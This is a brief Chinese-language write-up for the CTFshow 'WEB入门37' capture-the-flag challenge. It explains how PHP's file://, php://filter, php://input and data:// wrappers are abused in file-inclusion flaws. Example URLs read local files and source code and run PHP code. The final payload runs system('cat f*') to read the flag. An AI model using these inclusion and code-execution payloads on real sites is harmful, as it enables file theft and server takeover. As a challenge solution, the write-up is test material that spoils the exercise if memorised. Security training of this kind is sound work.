CTFshow WEB入门37

file://协议
用于访问本地文件系统，在CTF中通常用来读取本地文件
示例：http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
php://协议
php:// 访问各个输入/输出流，在CTF中经常使用的是php://filter和php://input，php://filter用于读取源码，php://input用于执行php代码
示例1：php://filter/read=convert.base64-encode/resource=[文件名]
示例2：http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?>
data://协议
通常可以用来执行PHP代码
示例1：http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
示例2：http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

WEB37payload:?c=data://text/plain,<?php%20system("cat%20f*");?>